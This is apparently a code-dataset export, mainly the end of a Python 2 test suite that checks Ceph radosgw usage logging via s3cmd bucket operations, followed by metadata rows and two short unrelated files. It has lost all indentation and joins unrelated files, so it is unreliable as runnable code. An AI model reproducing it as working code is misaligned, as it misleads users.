expect_dict9 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"put_acls": {"ops": 1, "successful_ops": 1},
"get_acls": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 2, "successful_ops": 1},
"multi_object_delete": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict10 = expect_dict2
expect_dict11 = expect_dict3
expect_dict12 = expect_dict8
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict9)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict10)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict11)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict12)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
print "testcase21 %s" % (ok_display("OK"))
else:
print "testcase21 %s" % (fail_display("FAIL"))
else:
print "testcase21 %s" % (fail_display("FAIL"))
else:
print "testcase21 %s" % (fail_display("FAIL"))
self.clean()
class TestCase22(object):
def prepare(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser2 --access=full --access-key=subuser2 --secret-key=subuser2')
exec_based_on_version('radosgw-admin user create --uid=user2 --access-key=user2 --secret-key=user2 --display-name="user2"')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user2 --subuser=subuser2 --access=full --access-key=subu02 --secret-key=subu02')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user2 --subuser=subuser3 --access=full --access-key=subu03 --secret-key=subu03')
os.chdir(py_dir)
def op1(self):
exec_command('s3cmd -c user1.s3cfg mb s3://test1')
exec_command('s3cmd -c subuser1.s3cfg put user1.s3cfg s3://test1')
exec_command('s3cmd -c subuser2.s3cfg mb s3://test2')
exec_command('s3cmd -c user2.s3cfg mb s3://test01')
exec_command('s3cmd -c subu02.s3cfg put user2.s3cfg s3://test01')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c user1.s3cfg setacl s3://test1 --acl-grant=write:user2')
exec_command('s3cmd -c user1.s3cfg setacl s3://test1 --acl-grant=read:user2')
exec_command('s3cmd -c user2.s3cfg put user2.s3cfg s3://test1')
exec_command('s3cmd -c subu02.s3cfg get s3://test1/user2.s3cfg 22-1.txt')
exec_command('s3cmd -c subu03.s3cfg ls s3://test1')
time.sleep(30)
def op3(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin subuser rm --uid=user1 --subuser=subuser2')
os.chdir(py_dir)
def op4(self):
exec_command('s3cmd -c subu02.s3cfg put subu02.s3cfg s3://test2')
time.sleep(30)
def clean(self):
exec_command('s3cmd -c user1.s3cfg rb s3://test1 --recursive')
exec_command('s3cmd -c user1.s3cfg rb s3://test2')
exec_command('s3cmd -c user2.s3cfg rb s3://test01 --recursive')
time.sleep(30)
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin usage trim --uid=user1')
exec_based_on_version('radosgw-admin usage trim --uid=user2')
exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
exec_based_on_version('radosgw-admin user rm --uid=user2 --purge-data --purge-keys')
os.chdir(py_dir)
exec_command('rm 22*.txt')
def run(self):
result1 = result2 = result3 = result4 = result5 = result6 = False
self.prepare()
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict4 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict5 = {"entries_size": 1,
"user2:subuser2": {"test01": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict6 = {"entries_size": 0}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict4)
result5 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subuser2', expect_dict5)
result6 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subuser3', expect_dict6)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == result5 == result6 == True:
self.op2()
expect_dict7 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_acls": {"ops": 2, "successful_ops": 2},
"put_acls": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict8 = expect_dict2
expect_dict9 = expect_dict3
expect_dict10 = expect_dict4
expect_dict11 = {"entries_size": 1,
"user2:subuser2": {"test01": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}},
"test1": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict12 = {"entries_size": 1,
"user2:subuser3": {"test1": {"categories": {"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict9)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict10)
result5 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subuser2', expect_dict11)
result6 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subuser3', expect_dict12)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == result5 == result6 == True:
self.op3()
expect_dict13 = expect_dict7
expect_dict14 = expect_dict8
expect_dict15 = expect_dict9
expect_dict16 = expect_dict10
expect_dict17 = expect_dict11
expect_dict18 = expect_dict12
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict13)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict14)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict15)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict16)
result5 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subuser2', expect_dict17)
result6 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subuser3', expect_dict18)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == result5 == result6 == True:
self.op4()
expect_dict19 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_acls": {"ops": 2, "successful_ops": 2},
"put_acls": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 0}}}}}
expect_dict20 = expect_dict14
expect_dict21 = expect_dict15
expect_dict22 = expect_dict16
expect_dict23 = {"entries_size": 1,
"user2:subuser2": {"test01": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}},
"test1": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 0}}}}}
expect_dict24 = expect_dict18
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict19)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict20)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict21)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict22)
result5 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subuser2', expect_dict23)
result6 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subuser3', expect_dict24)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == result5 == result6 == True:
print "testcase22 %s" % (ok_display("OK"))
else:
print "testcase22 %s" % (fail_display("FAIL"))
else:
print "testcase22 %s" % (fail_display("FAIL"))
else:
print "testcase22 %s" % (fail_display("FAIL"))
else:
print "testcase22 %s" % (fail_display("FAIL"))
self.clean()
class TestCase23(object):
def prepare(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser2 --access=full --access-key=subuser2 --secret-key=subuser2')
os.chdir(py_dir)
def op1(self):
exec_command('s3cmd -c user1.s3cfg mb s3://test1')
exec_command('s3cmd -c subuser1.s3cfg put user1.s3cfg s3://test1')
exec_command('s3cmd -c subuser2.s3cfg ls s3://test1')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c user1.s3cfg put subuser1.s3cfg s3://test21331')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c subuser2.s3cfg ls s3://test77')
time.sleep(30)
def op4(self):
exec_command('s3cmd -c subuser1.s3cfg put dagfdagad s3://test1')
time.sleep(30)
def clean(self):
exec_command('s3cmd -c user1.s3cfg rb s3://test1 --recursive')
time.sleep(30)
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin usage trim --uid=user1')
exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
os.chdir(py_dir)
def run(self):
result1 = result2 = result3 = False
self.prepare()
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 1,
"user1:subuser2": {"test1": {"categories": {"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op2()
expect_dict4 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"-": {"categories": {"put_obj": {"ops": 1, "successful_ops": 0}}}}}
expect_dict5 = expect_dict2
expect_dict6 = expect_dict3
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict4)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict5)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict6)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op3()
expect_dict7 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"-": {"categories": {"put_obj": {"ops": 1, "successful_ops": 0},
"list_bucket": {"ops": 1, "successful_ops": 0}}}}}
expect_dict8 = expect_dict5
expect_dict9 = {"entries_size": 1,
"user1:subuser2": {"test1": {"categories": {"list_bucket": {"ops": 1, "successful_ops": 1}}},
"-": {"categories": {"list_bucket": {"ops": 1, "successful_ops": 0}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict9)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op4()
expect_dict10 = expect_dict7
expect_dict11 = expect_dict8
expect_dict12 = expect_dict9
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict10)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict11)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict12)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
print "testcase23 %s" % (ok_display("OK"))
else:
print "testcase23 %s" % (fail_display("FAIL"))
else:
print "testcase23 %s" % (fail_display("FAIL"))
else:
print "testcase23 %s" % (fail_display("FAIL"))
else:
print "testcase23 %s" % (fail_display("FAIL"))
self.clean()
if __name__ == '__main__':
test_case1 = TestCase1()
test_case1.run()
test_case2 = TestCase2()
test_case2.run()
test_case3 = TestCase3()
test_case3.run()
test_case4 = TestCase4()
test_case4.run()
test_case5 = TestCase5()
test_case5.run()
test_case6 = TestCase6()
test_case6.run()
test_case7 = TestCase7()
test_case7.run()
test_case8 = TestCase8()
test_case8.run()
test_case9 = TestCase9()
test_case9.run()
test_case10 = TestCase10()
test_case10.run()
test_case11 = TestCase11()
test_case11.run()
test_case12 = TestCase12()
test_case12.run()
test_case13 = TestCase13()
test_case13.run()
test_case14 = TestCase14()
test_case14.run()
test_case15 = TestCase15()
test_case15.run()
test_case16 = TestCase16()
test_case16.run()
test_case17 = TestCase17()
test_case17.run()
test_case18 = TestCase18()
test_case18.run()
test_case19 = TestCase19()
test_case19.run()
test_case20 = TestCase20()
test_case20.run()
test_case21 = TestCase21()
test_case21.run()
test_case22 = TestCase22()
test_case22.run()
test_case23 = TestCase23()
test_case23.run()
| [
"enming.zhang@umcloud.com"
] | enming.zhang@umcloud.com |
05ea985615632303be491be1f8e52b26dc8a23b5 | 87f57cf6e925c8d3aaac36f1dce33c613ce92cad | /publishers/wubytes_publisher.py | 7856fc67c78e26b3b2dccb6b4849a360f192d892 | [
"MIT"
] | permissive | weapp/miner | a0fe10ad1c7111a0641d535e90616da79b4f08c2 | e89bc2dc043889a9bbee21bd5c611154c2f84d06 | refs/heads/master | 2020-04-09T07:43:50.925072 | 2014-06-03T21:26:46 | 2014-06-03T21:26:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 674 | py | from base_publisher import BasePublisher
from pprint import pprint as pp
from wu_client import WuClient
from shared.path import Path
class WubytesPublisher(BasePublisher):
def __init__(self, conf):
BasePublisher.__init__(self, conf)
self.wc = WuClient(conf["client_id"], conf["client_secret"], conf["host"])
if not self.wc.auth(conf["username"], conf["pass"]):
exit()
for key in self.project.project:
self.wc.new_wu({'data': 0, 'title': key, 'slug': key})
def publish(self, message):
for key, value in message.iteritems():
print key, value
self.wc.update_value(key, value)
| [
"weap88@gmail.com"
] | weap88@gmail.com |
48ee6be5fa369aab7a24d7f1be33ef53dfa886a5 | e452f89c51180487f2ed68c33ca2fed54e14a967 | /1-Python-Programming-Basics (Sep 2020)/Course-Exercises-and-Exams/02_Conditional-Statements/01.Lab-01-Excellent-Result.py | 4d9450ac08bdcaf06642e2351b5898ce2cc0b984 | [
"MIT"
] | permissive | karolinanikolova/SoftUni-Software-Engineering | c996f18eea9fb93164ab674614e90b357ef4858a | 7891924956598b11a1e30e2c220457c85c40f064 | refs/heads/main | 2023-06-21T23:24:55.224528 | 2021-07-22T16:15:59 | 2021-07-22T16:15:59 | 367,432,464 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | # 1. Проверка за отлична оценка
# Първата задача от тази тема е да се напише конзолна програма, която чете оценка (реално число),
# въведена от потребителя и отпечатва "Excellent!", ако оценката е 5.50 или по-висока.
grade = float(input())
if grade >= 5.50:
print("Excellent!") | [
"Nikolova@eum.root.eumetsat.int"
] | Nikolova@eum.root.eumetsat.int |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.